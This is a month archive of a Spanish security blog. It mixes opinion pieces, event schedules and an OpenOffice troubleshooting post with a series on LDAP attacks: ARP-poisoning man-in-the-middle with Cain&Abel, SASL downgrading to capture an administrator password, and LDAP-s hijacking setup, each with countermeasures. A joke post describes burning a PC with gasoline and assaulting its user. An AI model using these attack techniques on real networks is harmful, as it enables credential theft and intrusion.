Un informático en el lado del mal: mayo 2008

sábado, mayo 31, 2008

El Tapado

Hay que tener cerca a los amigos, pero más cerca a los enemigos, que así los tienes vigilados. Mi tiempo y mi cerebro no han dado tregua para recordar quien dijo esta frase o si era exactamente así, pero lo cierto es que está llena de cierta lógica.

En el competitivo mundo de las empresas tecnológicas el analizar a la competencia a cada instante es una obligación y una realidad constante. Spectra, para analizar el mundo del software "libre" y OpenSource tiene montado Port25. Allí, en Port25 se prueban y se analizan soluciones de todo tipo y por supuesto de Linux. Se sacan conclusiones, guías, avances e incluso, como ya sabéis, algunas soluciones se usan en productos de Spectra.

La idea de muchos, es que al poder ver el código fuente se puede estar preparado contra nuevos enemigos o amenazas... empresariales por lo que hay que estar atentos a lo que se cuece y antes de que nazca algo grande...utilizarlo. En varias conversaciones he oido que Google no sería hoy lo que es si el codigo del Pagerank hubiera estado en una web de productos opensource.... Spectra habría copiado la idea. Youtube no hubiera sido lo que se convirtió si el código de procesado, repartición de carga y streaming de video hubiera estado publicado, Google lo hubiera copiado.

Curiosamente Google, Youtube, Spectra y quien queráis hacen uso intensivo de productos de Software Libre o Código abierto para mejorar, pero la propia naturaleza del OpenSource hace que los pequeños proyectos, e incluso los no tan pequeños, se las vean y se las deseen para competir con estas empresas, cayendo, casi sistemáticamente todos los proyectos de software libre u Open Source que consiguen hacer algo de dinero en manos de las grandes multinacionales, poquito a poco. Sun compra sus empresas, Citrix las suyas, Google "apadrina" y subvenciona sus proyectos para tenerlos controlados, Oracle compra las suyas. Algunas, más despiertas, se dan cuenta de esto y cierran partes de su código antes de que les esquilmen las idéas. Sólo los grandes y antiguos proyectos, con mucho camino a la espalda viven de este modelo de negocio.

Con el caso de Linux, pues sucede lo mismo. Al final, cuando da con una ventaja tecnológica, rápidamente va a ser copiada por los demás, por lo que siempre le va a costar tener mucha ventaja en algo y además va a tener que descubrir que ventajas tecnológicas tienen los demás. Es como si en el caso Ferrari contra McLaren en la Fórmula 1 nos encontraramos con que McLaren pusiera todo lo que avanza en una web pública y Ferrari pudiera usarlo.

Esto, desde el punto de vista empresarial es una putada y hay otros que lo tienen claro, y sus ventajas competitivas no las publican. Así el Pagerank de Google, la distribución de carga de Youtube, el kernel de Vista, la gestión de StarOffice en entronos distribuidos, el código de Oracle Database, el de IBM WebSphere o el BEA WebLogic no se descargan de una URL.

Si yo tuviera una idéa de innovación tecnológica empresarial, me guardaría mi ventaja competitiva, lo tengo clarísimo y Apple también lo tiene. Así, la compañía de la manzanita, que llegó casi a desaparecer se está convirtiendo en el tapado de los sitemas operativos.

Día tras días, mes tras mes, las cuotas de utilización de Apple crecen y crecen. Pasando de ser código abierto, software libre y cosas de esas, se han metido con una cuota de mercado cercanas ya al 10%. Se han preocupado de sus cosas, de su negocio, de proteger la ventaja competitiva y, tras pasar de radicalismos que veían el fin del mundo en ello se han pasado a Intel, han seguido con su política de ser más caros pero posicionarse como un producto distintivo, han seguido siendo... Apple, y se están....FORRANDO.

El i-Mac, el i-Book, el i-Pod, el i-Phone, el i-tunes, el i-diota o lo que sea, pero lo venden. Da igual que no expliquen mucho de él (aun recuerdo la publicidad del i-phone) o que los accesorios para el equipo sean más caros. La gente paga ¿10 € más? por un gadget de Mac porque cuando lo pincha... funciona todo a la primera. Sí, sólo soportan un número reducido de cacharros pero... a muchos usuarios les da lo mismo.

Yo tengo mis dudas sobre Mac en el futuro, que ya os dejé planteadas, pero, imaginaros cuando alguien llega y dice:

"Fabricante, queremos drivers libres de tu cacharraro para nuestro Linux. Somos un 1% de cuota de SO en desktop, y nos repartimos entre un 0.000013 % que usan Fedora, 0.000234 % que usan Debian ..."

A lo que el fabricante de gadgets dice:

"Espera chaval y apartate de aquí, que voy a ver si consigo que Apple me deje hacer i-tornillos para MAC, luego ya si eso, un día de estos, ya nos sentamos y charlamos de esas cosas vuestras del arte, el software libre y lo de el problema ese de la capa de butano y eso que también os apoyo en eso... aparta, aparta, aparta, que viene el i-comercial en su i-Ferrari".

Al final, unos hablando y otros haciendo... caja.

Saludos Malignos!

viernes, mayo 30, 2008

Nota Mental 1

"No olvidar comprobar que publicidad voy a poner en el sitio web."

Ataques a LDAP (III de IV)

Captura de datos transmitidos desde el árbol LDAP con Wireshark
Para evitar este tipo de ataques, reconocidos también en la RFC 4422, como ataques pasivos, se debe fortificar y cifrar el protocolo LDAP mediante el uso de LDAP-s y certificados digitales. No obstante, es posible realizar un ataque de Hijacking[21] de sesión, como se verá en el Ataque 4, mediante el uso de certificados digitales falsos si no existe una férrea comprobación de los certificados.

2.4.- Ataque 4: Hijacking LDAP-s. Paso 1: Configuración LDAP-s

La utilización de un sistema LDAP-s, es decir, encapsular las conexiones LDAP mediante un túnel SSL, puede ofrecer a los administradores la falsa tranquilidad y confianza en tener un sistema seguro. No obstante, el uso de esta tecnología no es garantía de éxito para conseguir evitar los ataques y existen pruebas de concepto públicas para atacar a estos entornos.

Para probar el riesgo de este ataque, es necesario implementar un sistema de certificados en el lado del servidor. Para realizar esta prueba se ha utilizado el Directorio Activo de un Windows Server 2003. A través del siguiente proceso, vamos a establecer los mecanismos para configurar un controlador de dominio Windows 2003 para trabajar con conexiones LDAP-s. Para ello utilizaremos una Entidad Certificadora de Microsoft de tipo independiente[22], instalada sobre el mismo controlador de dominio, y para las pruebas de conexión emplearemos el cliente LDP de Microsoft que viene con el grupo de herramientas SupportTools[23] disponibles de forma gratuita. En este entorno se va a configura las conexiones a través del puerto “well-known” asignado a las conexiones LDAP-s, es decir, el puerto 636.

El primer elemento del proceso, consiste en la petición de un certificado para la autentificación del servidor. Para realizar la petición del certificado se utiliza un fichero de petición X.509[24] para la autentificación de servidor con el siguiente formato.

Se genera un fichero en texto plano para realizar la petición de un certificado X.509. En él se configuran los parámetros necesarios para que pueda ser utilizado en el cifrado de conexiones LDAP-s
Este fichero servirá para la creación del archivo de solicitud, que se generará mediante el uso de la aplicación certreq, disponible por defecto en los sistemas Microsoft Windows Server.

A partir del fichero creado, con la utilidad certreq se crea un fichero de solicitud .req que será enviado a la entidad certificadora
Con posterioridad se procede a enviar, usando la utilidad certreq, la solicitud a la Entidad Certificadora, en este caso la entidad certificadora es una Entidad de tipo Independiente denominada “caI64”.

El fichero de solicitud es enviado a la entidad certificadora para que ésta emita el certificado digital asociado a esa petición
Una vez enviada, se comprueba que la petición ha llegado satisfactoriamente y se procede a emitir un certificado asociado a esa petición.

La entidad certificadora procede a la emisión del certificado asociado a la petición
Una vez que la petición ya ha sido emitida, se procede a generar la copia del certificado codificándolo en base64, para su instalación posterior en el servidor correspondiente.

Se exporta el certificado usando una codificación Base-64 para que pueda ser instalado en el servidor dónde se está ejecutando el servicio LDAP
Una vez que el certificado ha sido emitido, debe ser instalado en el servidor dónde esté instalado el árbol LDAP. Para aceptar e instalar el certificado emitido, se utilizará nuevamente la utilidad certreq, en este caso con el modificador –accept que dejara totalmente funcional el certificado.

En el servidor se acepta e instalación el certificado digital mediante certreq
Se comprueba a través de la consola de certificados del equipo local, que este ha sido instalado satisfactoriamente y que tenemos la clave privada correspondiente como medida de seguridad adicional.

Se comprueba el certificado digital instalado mediante el uso de la herramienta de gestión de certificados digitales del servidor
Una vez configurado el Servidor, en la parte Cliente lo único que se necesita es confiar en la Entidad Emisora de Certificados que emitió el certificado del Servidor. Este proceso es importante, pues si no se puede comprobar la autenticidad del certificado, su uso no sería válido, y, como veremos, no protege la conexión frente a los ataques.

Como último paso se puede proceder a realizar una conexión LDAP-s. En este caso se ha utilizado la herramienta LDP de Microsoft. Como se puede ver en la captura se configura el uso de SSL y el puerto 636 para realizar la transmisión de datos.

Una vez configurado se procede a la solicitud de la conexión usando el protocolo LDAP-S
A partir de este momento, toda la transmisión de datos se realiza mediante el uso del protocolo SSL que cifra las conexiones extremo a extremo. Este cifrado evita que alguien que no esté situado en un extremo del túnel SSL pueda acceder a los datos.

La conexión LDAP-S establecida
Una vez implantado este entorno LDAP-s se podría pensar que la arquitectura es segura, sin embargo, se han hecho públicas herramientas que implementan un ataque basado en Hijacking de sesiones LDAP-s. Una de esas herramientas es Cain&Abel, a partir de su versión 4.9.6 y en el siguiente apartado se puede ver cómo funciona este ataque.

***************************************************************************************
Ataques a LDAP (I de IV)
Ataques a LDAP (II de IV)
Ataques a LDAP (III de IV)
Ataques a LDAP (IV de IV)
***************************************************************************************

jueves, mayo 29, 2008

¿Piratas o simplemente Ratas?

Hola pequeños hobbits!

ya vale de dorarse la pildora, basta ya de masturbarse, hay que ponerse al lio. Hay que demostrar que no soys ratas. Con motivo de la Defcon16 se realiza desde el año 2005 el Pre-Capture The Flag un fin de semana para resolver diferentes pruebas hacking. Los ganadores consiguen un paseo a Las Vegas para jugar al CTF en directo. Sabéis que las Defcon16 son en Las Vegas, una ciudad llena de... y de... y con... y un montón... y ademas te puedes... vamos, que Las Vegas es un sitio que NO quieres conocer.

Para eso hay que pasar las prequals seres lamentables, y ningún Luser irá allí, así que hay que ponerse las pilitas. El anuncio oficial lo tenéis aquí: http://www.kenshoto.com/

La clasificatoria son multiples pruebas de diferente puntuacion con distinta tematica : retos web / reverse enginyeering / exploiting / trivial / forensics.

Y para que tengáis más información de lo que allí se cuece, aquí tenéis las soluciones de años anteriores:

- Soluciones 2007: http://nopsr.us/ctf2007prequal/
- Soluciones 2006: http://nopsr.us/ctf2006prequal/

Y el motivo por el que participar es: "Cuz ur lam3rz if u d0nt"

Más claro... RoMaNSoft. Así que nada, monta un equipo con tus compañeros de intercambio de porno, registrate y deja alto el pabellón hispanoparlante ¡coño!

Yo participaría con vosotros, pero sabéis que yo ya voy a asistir así que... me voy a enganchar este finde al pornotube y voy a ver si aguanto lo mismo que con el Youtube.

Saludos Malignos .... ratas!

InfoSecurity 2008

Hola seres!

Acabar el semestre siempre atareado, y los meses de Mayo y Junio son especialmente azarosos, así que vamos un poco justos de tiempo, pero ya tenemos disponible la agenda de actividades que vamos a tener en Infosecurity 2008. Como sabéis esta es una feria que lleva varios años dedicada al sector de la Seguridad Informática, allí estarán muchos fabricantes con un montón de actividades y nosotros estaremos también. La feria tendrá lugar los días 11 y 12 de Junio en Madrid. La entrada es gratuita, pero hay que registrarse. La URL de registro es: http://www.infosecurity.com.es/

Nostors vamos a participar con tres tipos de acitividades, que paso a relataros:

- Conferencias

Son charlas en una sala que tendremos destinada para 200 personas. Para que no haya problemas de acceso, se repetirá la misma charla los días 11 y 12 en el mismo horario. Así que unos podréis elegir si queréis asistir y qué día hacerlo. Las charlas son:

10:00 - 11:00 - Conceptos básicos de seguridad y protección de sistemas operativos Spectra. Ejemplos prácticos con Windows Vista y Windows Server 2008
Ponente: David Cervigón, Spectra IT Pro Evangelist

11:45 - 12:30 - Protección perimetral y acceso seguro a internet basada en cortafuegos: Ejemplos con ISA Server 2006
Ponente: Chema Alonso, Spectra MVP Windows Security, Informática64

13:15 - 14:00 - Configuración de VPN para publicación segura de aplicaciones para acceso remoto. Casos prácticos con Microsoft Intelligent Application Gateway 2007
Ponente: José Parada, Spectra IT Pro Evangelist

15:00 - 15:45 - Seguridad en servidores de Colaboración y Correo Electrónico. Ejemplos con Forefront Security for Exchange y SharePoint Server
Ponente: Joshua Saenz Guijarro, Spectra MVP Exchange Server, Informática64

15:45-16:30 Seguridad Avanzada en el puesto de trabajo Windows. Configuración práctica de Forefront Client Security
Ponente: Juan Garrido, Consultor de Seguridad Informática64

Hands On Lab guiados

Los Hols guidados son sesiones de 30'-45' dónde un técnico hará una demo sobre una tecnología en concreto. Se realizarán en la sala de Hands On Lab que está situada en la última planta, en la zona de la feria detrás de los stands de Informáticat64 y Spectra. Cada sesión está limitada a 20 - 25 plazas y hay que registrarse previamente en el Stand. Se repetirá la misma agenda los días 11 y 12 de Junio. Los horarios y contenidos son:

11:00 – 11:45 - Seguridad SQL Server 2008
Ponente: Rubén Alonso, Spectra MVP SharePoint, Informática64

12:30 – 13: 15 - Seguridad Exchange Server 2007
Ponente: Joshua Saenz Guijarro, Spectra MVP Exchange Server, Informática64

14:00 – 14:45 – IIS7, WebSecurity.
Ponente: Alejandro Martin, Consultor Seguridad, Informática64

16:30 – 17:15 - Forefront Security Server
Ponente: Joshua Saenz Guijarro, Spectra MVP Exchange Server, Informática64

18:00 – 18:45 – Seguridad en Windows Server 2008
Ponente: Pedro Laguna, Spectra MSP, Consultor Seguridad Informática64

Hands On Lab autoguiados

Los Hands On Lab autoguiados estarán formados por 20 máquinas y 20 puestos para máquinas traídas por los visitantes dónde podrán arrancar el entorno de trabajo. Cada Hol va acompañado de una guía y estarán varios técnicos para resolver dudas sobre el HOL. Los asistentes podrán trabajar con sus portátiles con Hands On Lab autoguiados sólo cuando no haya Hands On Lab guiados.

Cada asistente podrá registrarse sólo a un HOL y cuando lo acabe podrá registrarse a otro. Los Hols autoguiados que dispondrán serán los siguientes:

- MS Exchange Server 2007: Defiende tu territorio de mensajería
- Forefront Server Security: Misión buscar y destruir
- Seguridad SQL Server 2008
- Adminsitración remota de IIS7 mediante HTTPS
- Forefront Client
- Seguridad Windows Server 2008
- Certificados autofirmados en IIS7
- Técnicas Hacking

Los horarios durante los que se pueden realizar HOLs autoguiados son:

- Día 11 de Junio de 11:00 de la mañana a 18:00 horas
- Día 12 de Junio de 10:00 de la mañana a 16:00 horas

Así que nada, que lo disfrutéis.

Saludos Malignos!

miércoles, mayo 28, 2008

David y las FIST

Hace tiempo conocí a una persona encantadora. Sí, ya sé que esto se dice muchas veces de mucha gente, pero que David Carrasco es un encanto de persona es innegable. Amable, educado, cariñoso al hablar y superinteresante en su conversación. A ver, ¿cuántos de nosotros somos apasionados de la tecnología, el manga, la cultura japonesa, ser profesor (y ser Trainer certificado de Spectra) y la comida vegetariana?... Vale...bueno, es cierto tal vez más de uno, pero además David siempre me trae un manga-regalo a todas las conferencias y por eso le quiero más ;).

David está certificado en... ¿todo? y es un experto en certificaciones así que cuando alguien quiera saber algo sobre las certificaciones de Spectra puede ir a su blog o ponerse en contacto con él.

Este viernes por la tarde, en las conferencias FIST que se realizan en Madrid en la EUI hablará sobre Seguridad en Windows Server 2008 y yo pienso asistir a verle y si puedo le regalaré un No Luser.

No quiero desmerecer al resto de los ponentes que asistirán, dónde hablarán Gonzalo Álvarez Marañón, al que hay que descubrir poco después de años trabajando en esto, Vicente Aceituno o Juan Manuel Canelada, de los que podéis encontrar fácilmente información en Internet.

Vosotros también podéis venir, la agena es:

18:00:00 Presentación Gonzalo Álvarez Marañón (CSIC)
18:10:00 Tendencias en ataques mediante memorias USB Juan Manuel Canelada Oset (Universidad Carlos III de Madrid)
19:10:00 Gestión de Usuarios en la Empresa Vicente Aceituno (ISM3 Consortium)
20:00:00 Descanso
20:10:00 Seguridad en Windows Server 2008 David Carrasco, (Microsoft Certified Trainer)

Y el registro lo podeis hacer por aquí: FIST 30 Mayo 2008 - Madrid

Saludos Malignos!

Vista local tricks

Hola element@s!

Supongo que todos habéis visto el "hackeo" o "trick" de como conseguir una shell en Windows Vista mediante la manipulación del sistema offline. Este tipo de acciones se conocen y se persiguen desde hace mucho tiempo y en TODOS los sistemas operativos así que se inventaron los sistemas de cifrado de disco, cifrado de tabla de particiones y arranque seguro. En Windows Vista se llama Bitlocker y para Windows XP hay muchas herramientas comerciales que lo hacen.

Para los amantes de estos tricks hay alguno otro muy chulo:

#1 Information Disclosure: Arrancas con otro sistema operativo en un disquete/usb/CD y te copias todos los datos de las particiones de datos.

#2 Elevation of Privivileges: Arrancas con el ERD y le cambias la password al administrador, arrancas luego con el sistema y eres el admin. Wow!!

#3 Information Disclosure: Arracas con otro sistema, copias el pagefile.sys, la sam, el registro, los ficheros de log y to lo que te venga bien, y te enteras de todo, todo, todo.

#4 Denial of Service: Arrancas con otro sistema operativo y te follas la tabla de particiones, luego cuando venga, a ver quien es el guapo que lo arranca.

#5 Denial of Service: Pones una lata de gasolina debajo del pc, le metes un trapo humedecido en gasolina y prendes el trapo con mechero. Para que no falle el sistema, es recomendable poner un poco de gasolina por encima de la carcasa. Este ataque es conocido como "gas pill".

#6 Cam in the middle: Para hacer este ataque tienes que acercarte al equipo, poner una camara de video dentro de una figurita china de un guerrero de Xian (se recomienda este tipo, pq todo el mundo tiene una de estas) o un budda (que es gordito y puedes poner cinta VHS TDK de 240 minutos y doble duración) y grabas la password. Así conseguimos, además, de enterarnos de todos los comandos que lee.

#7 Robo de Información: Basta con acercarse el sistema, ponerlo en el maletero y arrancar la furgoneta. En este caso no hace falta arrancar la furgoneta con otro sistema operativo y con las mismas llaves con su llavero de Mahou o Cruzcampo vale.

#8 Temporary Denial of Service: Para este ataque hay dos posibilidades: Por hardware o por software.

- Ataque Hardware: Te acercas al sistema, le metes un destornillador en la fuente de alimentación (previamente desconectada, que tu eres un esquimal como tu padre...) y te la cargas. Puedes aplicar algo similar a los ventiladores y que se queme el micro o la memoria.

- Ataque Software: Mandas al guardaespaldas de Ana Obregón a que le haga una vistia al usuario del ordenador y que le partan algo, lo suficiente para que se tome la baja. Eso sí, que no sean duros, algo "soft". Nota, este ataque, según dicen, tiene más larga duración en funcionarios, así que hay que ser softer aún.

Bueno, yo sólo os dejo algunos ataques en local que he recogido de la sabiduría popular y creo que algunos de ellos, Spectra aún no lo has parcheado...

Saludos Malignos!

martes, mayo 27, 2008

Las sesiones de la formación.

Hola amig@s,

se acercan las fechas y os informaré de todas las cosas que están por venir: La campaña de Hols en Julio en Madrid, el curso de Verano de la Universidad de Salamanca dónde van a venir muchos "bichos gordos", Infosecurity, dónde ya tenemos definidas los hols, las sesiones autoguiadas y las conferencias, y la Formación Técnica de Seguridad y Auditoría Informática. De esta última os voy a ir informando de cuales son las sesiones que se van a ir dando y hoy os dejo el planing de la primera semana: Conceptos de Auditoría de seguridad

Durante esta semana vamos a estar Juan Garrido "silverhack", Antonio Guzmán, Doctor en Informática y profesor de Seguridad Informática en la Universidad Rey Juan Carlos y Yo impartiendo las sesiones.

Lunes 9 de Junio

- Auditorías de Seguridad de Caja Blanca & Caja Negra
- Arquitecturas de Sistemas.

Mates 9 de Junio

- Bases de datos de Expedientes de Seguridad
- Catalogación de Vulnerabilidades

Miercoles 10 de Junio

-Técnicas de FootPrinting I
-Técnicas de FootPrinting II

Jueves 11 de Junio

- Técnicas de FingerPrinting I
- Técnicas de FingerPrinting II

Viernes 12 de Junio

- Laboratorio

Saludos Malignos!

Ataques a LDAP (II de IV)

Usuarios creados en el Directorio Activo

Configuración conexión cliente LDAP para acceder al árbol y poder realizar consultas

Dentro de la conexión es obligatorio identificarse con las credenciales de uno de los usuarios del árbol LDAP. Esta es la parte dónde se realiza la configuración de credenciales
Una vez realizada la configuración del Cliente y proporcionado las credenciales se procede a la conexión con el servidor LDAP y, tal y como se refleja en la figura siguiente, se obtiene como resultado el acceso al servicio de directorio, pudiendo acceder a todos los objetos para los que el usuario en cuestión tenga permiso de acceso.

Un vez la conexión está establecida al árbol LDAP se puede acceder a todos los objetos a los que el usuario utilizado en la conexión tenga acceso
Una vez que se ha comprobado que la conexión se ha realizado correctamente vamos a simular el proceso que el atacante puede realizar para conseguir la interceptación y el sniffing de esta sesión LDAP mediante el ataque de downgrading.

Utilizando Cain&Abel se realiza un ataque de hombre en medio. En esta fase se está realizando la configuración ARP-Poisoning, mecanismo que hará creer al cliente que la dirección del servidor está asociada a la MAC del atacante y viceversa, es decir, hará creer al servidor que la IP del cliente está asociada a la MAC del atacante. Esto le permite al atacante ponerse en medio de la comunicación
Para este entorno se utiliza ARP-Poisoning como técnica para realizar el ataque Man In The Middle. Lo primero que se debe realizar es el envenenamiento de la dirección física de las dos máquinas que intervienen en el proceso (Cliente y Servidor LDAP) para conseguir que el tráfico entre ambos pase por la máquina del atacante.

Como se puede apreciar, para que este ataque tenga éxito, el atacante debe estar situado en la misma red del Cliente o del Servidor para poder modificar las direcciones físicas de la comunicación.

Una vez puesta en marcha la sesión de Snifing, la herramienta espera a que se produzca la negociación SASL. En el momento que se detecta esa negociación se fuerza el uso de GSSAPI con Plain Text, para conseguir obtener las credenciales enviadas. En este caso, la autentificación interceptada, es la del usuario ‘Administrator’, que ha utilizado como contraseña la palabra ‘admin’.

Una vez se está produciendo el ataque de Man In The Middle, procedemos a realizar un nuevo proceso de autenticación contra el árbol LDAP utilizando las credenciales del usuario Administrador
Y como se puede ver, sin necesidad de realizar ningún proceso de cracking, se puede obtener la contraseña del administrador en texto claro.

La herramienta Cain&Abel intercepta la comunicación realiza el ataque de downgrading y accede a las credenciales LDAP del usuario Administrador
Un curioso mecanismo es descrito en la RFC 4422 para detectar un ataque de “Downgrading”, aunque no para evitar su realización. En la RFC se describe como medida adicional de seguridad a realizar una comprobación, una vez establecida la conexión con el árbol LDAP, de la lista de algoritmos de autenticación soportados. Si en la lista se encuentra alguno más robusto que el que se ha utilizado, esto es debido a que algún atacante ha modificado la negociación y por tanto debe cerrarse la conexión y comenzar un proceso de recuperación ante incidentes mediante el bloqueo de cuentas, la puesta en comunicación con el administrador del sitio o el cambio de credenciales.

La lista de los sistemas de autenticación soportados se describe en el atributo SupportedSASLMechanisms del objeto raíz del árbol LDAP permitiendo que el administrador, como medida de seguridad, elimine los algoritmos que pueden suponer un riesgo de seguridad en el entorno de trabajo. Así, en un ataque de downgrading el usuario no se podría conectar y se generaría una alerta de seguridad además de poder comprobarse si se ha sido víctima de un ataque de downgrading.

Configuración de mecanismos de autenticación en árbol LDAP
Las contramedidas, al igual que en el Ataque 1, consisten en evitar en este entorno la principal vulnerabilidad y lo que posibilita el ataque de downgrading, es decir, que se pueda producir un ataque de hombre en medio. Para evitarlo, la implantación de un sistema LDAP-s con comprobación segura de certificados digitales y el uso de sistemas IPSec, sin Pre-Shared Key, evitaría que se produjera este ataque.

***************************************************************************************
Ataques a LDAP (I de IV)
Ataques a LDAP (II de IV)
Ataques a LDAP (III de IV)
Ataques a LDAP (IV de IV)
***************************************************************************************

lunes, mayo 26, 2008

Guardia Pretoriana

Hola amig@s!

Últimente, después de los últimos acontecimientos acaecidos, he decidido ponerme una escolta, no vaya a ser que....Así que, de ahora en adelante, si no pesas más de 100 Kilogramos y mides más de 187 no puedes entrar a trabajar con nosotros.

Esta foto es de mi guardia pretoriana, y faltan un par de personajes de más de 100 también, pero que estaban en su turno de descanso....

Benjamín, Pedro Laguna, JuanFran y Filemaster

¡Alé! Cuando queráis algo de mí, decídselo a mis primos de zumosol.

Saludos Malignos!

Ataques a LDAP (I de IV)

***************************************************************************************
Ataques a LDAP (I de IV)
Ataques a LDAP (II de IV)
Ataques a LDAP (III de IV)
Ataques a LDAP (IV de IV)
***************************************************************************************
0.- Introducción

El presente artículo muestra los vectores de ataque conocidos y documentados contra los sistemas que utilizan árboles LDAP. El objetivo es recoger las amenazas conocidas, cuáles son sus vectores de ataque y qué opciones existen para mitigar o evitar los riesgos.

1.- Vulnerabilidades en implementaciones LDAP

Los árboles LDAP han sido utilizados como arquitectura de Back-end en muchas organizaciones y los posibles ataques que se han descubierto, implementado o ejecutado siempre se han visto restringidos a entornos muy concretos. No obstante, la proliferación de los sistemas de directorio como repositorio central de información, apoyados en árboles LDAP, de los cuales son algunos ejemplos destacados las soluciones de Microsoft Active Directory, Novell Directory Services, ahora rebautizado a Novell e-Dyrectory, Red Hat Directory Server, Oracle Internet Directory o IBM Directory, por citar las soluciones más implantadas, han hecho que los árboles LDAP sean pieza fundamental en la seguridad del sistema y objetivo en muchos de los ataques.

Una posible consecuencia de este retardo sufrido hasta convertirse en objetivo de los ataques de seguridad es el poco número de vulnerabilidades de seguridad descubiertas en las implementaciones de comerciales de los árboles LDAP. Esto es una especulación formada en primera aproximación, pues podría ser también que el reducido número de fallos de seguridad descubiertos sea debido a la alta calidad del software de las implementaciones. No obstante, si examinamos las vulnerabilidades descubiertas en la historia de, por ejemplo OpenLDAP, una de las implementaciones más extendidas, podemos ver que una vulnerabilidad/característica que incide en la seguridad de forma tan importante, cómo que la contraseña va en texto plano en autenticaciones TLS, no se ha contemplado hasta Agosto del año 2006, es decir, 6 años después del descubrimiento de la primera vulnerabilidad que se hizo pública para ese producto. Este tipo de vulnerabilidades, que son de fácil descubrimiento ya que solo se requiere un análisis de la conexión, no hubieran tardado tanto tiempo en aparecer de ser objeto de estudio masivo por la comunidad de investigadores de seguridad. Mirando todas las vulnerabilidades descubiertas en OpenLDAP a lo largo de su historia sólo se contabilizan, a día de hoy, 15 expedientes de seguridad, según la base de datos de Security Focus.

Este comportamiento se repite a lo largo de todas las implementaciones comerciales, luego se puede concluir que, hasta el momento los árboles LDAP no han estado sometidos a un estricto escrutinio por parte de la comunidad investigadora.

2.- Ataques y contramedidas en sistemas LDAP

En este apartado se van a recoger todos los ataques conocidos a día de hoy en los entornos en los que se utiliza LDAP. Hay que notar que no se van a explicar los exploits o ataques dependientes de vulnerabilidades en código que pudieran permitir ejecución de comandos pues estos son fallos en la implementación del árbol LDAP y no del diseño, arquitectura, configuración y/o uso que se haga de la tecnología.

Los ataques que se van a describir, son los conocidos para el robo de credenciales y el acceso a los datos transmitidos por una parte y por otra parte las inyecciones de código en aplicaciones web para extraer información y acceder a datos no securizados en árboles LDAP.

2.1.- Ataque 1. Ataque de Replay. Autenticación doble en entornos Pre-Shared Key.

Para este ataque hemos de suponer un entorno en el que los clientes se estén autenticando contra el árbol LDAP utilizando SASL S/Key, es decir, todos los clientes conocen una clave compartida. El atacante busca utilizar a un cliente como generador de respuestas ante desafíos emitidos por el servidor para conseguir una conexión autenticada sin tener la clave compartida.

En este entorno un atacante consigue acceso mediante el uso de la Pre-Shared Key de un usuario legítimo del sistema. Esta explotación se realiza aprovechándose de herramientas para realizar ataques Man In The Middle en redes inseguras como Ettercap o Yersinia, por poner algún ejemplo. Esta técnica puede combinarse con el Ataque 2, que realiza un downgrade del sistema de autenticación negociado entre el cliente y el servidor, para conseguir que el método a utilizar sea el de Pre-Shared Key. El siguiente diagrama muestra el proceso esquemático de envió de mensajes en un proceso de autenticación doble.

Esquema de pasos en un ataque de doble autenticación.
En el entorno descrito en el diagrama, las conexión 2 y la conexión 3 son correctas. Las RFCs dónde se describe el protocolo SASL, es decir, las RFC 2222 utilizada aún por la mayoría de productos comerciales, y la RFC 4422, actual revisión del protocolo, avisan de este tipo de ataques por lo que no se recomienda utilizar este sistema de autenticación en redes en las que no se pueda garantizar la autenticación de los participantes en la comunicación.

El uso de entornos LDAP-s, dónde los participantes de la comunicación van autenticados con certificados digitales y las conexiones son cifradas con SSL, en dónde se produzca una correcta comprobación de certificados y el uso de comunicaciones basadas en el protocolo IPSec, siempre y cuando el protocolo IPSec no use Pre-Shared Key, evita la posibilidad de este tipo de ataques.

***************************************************************************************
Ataques a LDAP (I de IV)
Ataques a LDAP (II de IV)
Ataques a LDAP (III de IV)
Ataques a LDAP (IV de IV)
***************************************************************************************

domingo, mayo 25, 2008

Spectra Office & OpenOffice

Hola amigos!

Supongo que ya os habréis enterado de que Spectra Office soportará nativamente ODF. También supongo que os habréis enterado de que el ISO 29500, es decir, el OOXML aprobado por ISO no estará en nuestros ordenadores hasta el próximo Service Pack de las versiones de Spectra Office. Esto es porque como ya sabéis, el OOXML que aprobó ISO contenía muchas recomendaciones, mejores y consejos aportados en su proceso de estandarización, con lo que el equipo de Office ha estado implementando todo esto, más el ODF, PDF y XPS, con el objetivo para dar a los clientes de Spectra Office la mejor herramienta del mercado.

Yo, como sabéis tuve problemas con el idioma en OpenOffice y he recibido muuuuchos comentarios y muuuuchos consejos sobre como corregirlo, pero ninguno me ha ayudado a corregir mi problema (snif!). Para todos los que me habéis ayudado en primer lugar quiero daros las gracias y en segundo lugar os he preparado una captura que seguro que os da toda la información necesaria:

Mi OpenOffice
1.- Sí, tengo instalado el idioma español en Administración/Soporte de Idiomas y además es el idioma por defecto. Ya os dije que tengo Ubuntu 8.04 en Español.

2.- Sí, el corrector de OpenOffice está funcionando porque como dije, cuando escribo mal algunas palabras en el texto me las sustituye (de la lista de sustitución que configuras en opciones), como por ejemplo nuebo por nuevo y cosas así. Esta lista, como ya sabéis depende del idioma seleccionado.

3.- Sí, el documento está puesto en spanish y el idioma en spanish y autocorreguir en spanish, como véis en la captura.

4.- Sí, está activado que me subraye los errores, cómo podéis ver en el icono de la barra de OpenOffice.

Supongo que será alguna cosa... pero ¿cuál?. ¿Alguna idea?

ACTUALIZACIÓN:

Después de recibir un consejo de una vieja amiga linuxera, he podido poner el corrector en castellano. Ahora resulta que la rayita que yo tenía en mi soporte de idiomas no es válida. Es decir, el blanquito, es decir, el cuadro sin seleccionar es NO instalado, la V significa instalado y la rayita que yo tenía es algo así como...¿ya se que quieres pero te van a dar por culo?. Además, porqué tengo que tocar el Gnome para tener soporte de castellano en... ¿OpenOffice?. Instalando esto me ha metido una jartá de archivos para otros programas.... y me ha hecho "reiniciar el sistema".

Ya tengo una 'V'

En otro orden de cosas, en OpenOffice he echado de menos mil detalles de Spectra Office, como el corrector semántico, la búsqueda de sinónimos, las smartags que te permiten mil detalles, como por ejemplo que te sustituya todas las palabras que escribes mal (como nuebo por nuevo) y las que tú quieras no, sin ya hablar de la integración con MOSS.

La experiencia con esta versión de OpenOffice es algo así como volver a manejar un Spectra Word... no se, ¿versión 97? ¿una 2000 quizás? Pero no es un Spectra Office 2003 ni 2007 ni en broma.

Saludos malignos desde mi ...Ubuntu!

sábado, mayo 24, 2008

Débil, Torpe y ahora “Gordito”

***************************************************************************************
Artículo publicado en Windows TI Magazine Abril'08
***************************************************************************************

No puedo decir que no deje de sorprenderme la constante lucha de marketing para convencer al gran público del uso de una u otra tecnología. Supongo que cuando los primeros investigadores e ingenieros, de esto que se denominaría la Ciencia de la Computación, empezaron a trabajar no se podían imaginar que esto se convertiría en una pelea en el barro por conseguir convencer a los clientes sobre el uso de una u otra tecnología.

